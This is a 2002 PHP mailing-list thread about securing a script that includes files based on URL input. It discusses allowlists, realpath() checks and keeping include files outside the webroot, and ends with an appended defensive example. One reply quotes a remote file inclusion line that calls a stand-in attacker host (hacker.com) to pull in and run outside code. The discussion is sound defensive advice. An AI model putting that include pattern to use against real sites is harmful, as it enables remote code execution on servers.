RE: [PHP] Umm... Uh-oh
That still wouldn't fix anything if you're including a file based on unchecked user input. Make an array in your file of "safe" files to include, that can be designated by the user.

    $safe_files = array("file1", "file2", "file3");
    // only include when the requested key really is in the safe list
    if (isset($safe_files[$_GET['include']])) {
        include("/path/to/include/" . $safe_files[$_GET['include']] . ".php");
    }

or...

    switch ($_GET['include']) {
        case 1: include("file1.php"); break;
        case 2: include("file2.php"); break;
    }

You should really, really, rethink your design where you have to include files based on something passed in the url.

---John Holmes...

> -----Original Message-----
> From: John Wards [mailto:[EMAIL PROTECTED]]
> Sent: Friday, October 04, 2002 6:14 AM
> To: Stas Maximov
> Cc: PHP General
> Subject: Re: [PHP] Umm... Uh-oh
>
> ah never thought of that!
>
> John
>
> On Friday 04 Oct 2002 11:14 am, Stas Maximov wrote:
> > The easiest and safest way to get around this problem is to place all your
> > include files outside of your webroot directory (say one level up), so they
> > will be accessible locally via includes, but NOT accessible via http.
> >
> > HTH, Stas

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Umm... Uh-oh
ah never thought of that!

John

On Friday 04 Oct 2002 11:14 am, Stas Maximov wrote:
> The easiest and safest way to get around this problem is to place all your
> include files outside of your webroot directory (say one level up), so they
> will be accessible locally via includes, but NOT accessible via http.
>
> HTH, Stas
Re: [PHP] Umm... Uh-oh
The easiest and safest way to get around this problem is to place all your include files outside of your webroot directory (say one level up), so they will be accessible locally via includes, but NOT accessible via http.

HTH, Stas

----- Original Message -----
From: "John Wards" <[EMAIL PROTECTED]>
To: "PHP" <[EMAIL PROTECTED]>
Sent: Friday, October 04, 2002 10:58 AM
Subject: Re: [PHP] Umm... Uh-oh

erm.. would that allow hackers access? Say I have a database include file, would hackers be able to get access to my database like this?

(include('http://mysite.com/datainc.php');)

I hope bloody not!!! if so how on earth do I get round that!

John
Re: [PHP] Umm... Uh-oh
That would not help you if you include files based on unchecked user input.

Justin French wrote:
> all my include files are *.inc, and I have a .htaccess file that makes
> apache refuse to serve those files directly thru http.
>
> Justin
Re: [PHP] Umm... Uh-oh
so as my files are all .php I would be okay from an external hacking attempt? I don't have any worry about internal as I am on a dedicated server

John

On Friday 04 Oct 2002 11:02 am, Justin French wrote:
> all my include files are *.inc, and I have a .htaccess file that makes
> apache refuse to serve those files directly thru http.
>
> Justin
Re: [PHP] Umm... Uh-oh
all my include files are *.inc, and I have a .htaccess file that makes apache refuse to serve those files directly thru http.

Justin

on 04/10/02 7:58 PM, John Wards ([EMAIL PROTECTED]) wrote:
> erm.. would that allow hackers access? Say I have a database include file,
> would hackers be able to get access to my database like this?
>
> (include('http://mysite.com/datainc.php');)
>
> I hope bloody not!!! if so how on earth do I get round that!
>
> John
Re: [PHP] Umm... Uh-oh
erm.. would that allow hackers access? Say I have a database include file, would hackers be able to get access to my database like this?

(include('http://mysite.com/datainc.php');)

I hope bloody not!!! if so how on earth do I get round that!

John

On Friday 04 Oct 2002 10:52 am, Marek Kilimajer wrote:
> Use realpath() to check the path. I also suspect your script is
> vulnerable to cross-site includes
> (include('http://hacker.com/script.inc');)
Re: [PHP] Umm... Uh-oh
Use realpath() to check the path. I also suspect your script is vulnerable to cross-site includes (include('http://hacker.com/script.inc');)

Rick Beckman wrote:
> Okay, I was mistaken... There is a gaping security hole in my simple li'l
> script... How do I modify it to only accept files from a certain path? I
> want the url format to be script.php?call=1 where "1" is the called file in
> the /includes/ directory. Just when I get optimistic I leave the entire
> system exposed. Yeah, that fits with my luck. :-)
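A fuller version of the two defences proposed in this thread, John Holmes's allowlist of "safe" files and Marek Kilimajer's realpath() check, written for Rick's script.php?call=1 layout. This is an added example, not code posted by anyone in the thread; the ../includes directory (outside the webroot, as Stas suggests) and the file names in it are assumptions.

```php
<?php
// Added example: allowlisted include dispatcher for script.php?call=1.
// Assumption: include files live in ../includes, outside the webroot.
declare(strict_types=1);

const INCLUDE_DIR = __DIR__ . '/../includes';

// Only these files may ever be included; the key is what ?call= may carry.
// File names are hypothetical.
const SAFE_FILES = [
    1 => 'home.php',
    2 => 'about.php',
    3 => 'contact.php',
];

/**
 * Map the user-supplied ?call= value to an absolute path, or return null
 * when it is not an allowlisted file that really exists inside INCLUDE_DIR.
 */
function resolve_include(string $call): ?string
{
    // Accept only a plain string of digits ("1"), nothing like "1/../x".
    if (!ctype_digit($call)) {
        return null;
    }
    $id = (int) $call;
    if (!isset(SAFE_FILES[$id])) {
        return null;             // unknown id: nothing to include
    }

    // Defence in depth: canonicalise both sides and confirm containment,
    // so a misconfigured allowlist entry still cannot escape the directory.
    $base = realpath(INCLUDE_DIR);
    $path = realpath(INCLUDE_DIR . '/' . SAFE_FILES[$id]);
    if ($base === false || $path === false) {
        return null;             // directory or file does not exist
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;             // resolved outside the include directory
    }
    return $path;
}

$path = resolve_include((string) ($_GET['call'] ?? ''));
if ($path === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $path;
```

Because the URL value is only ever used as an array key, no user-controlled text reaches include(), so neither a local path nor a remote http:// URL can be injected.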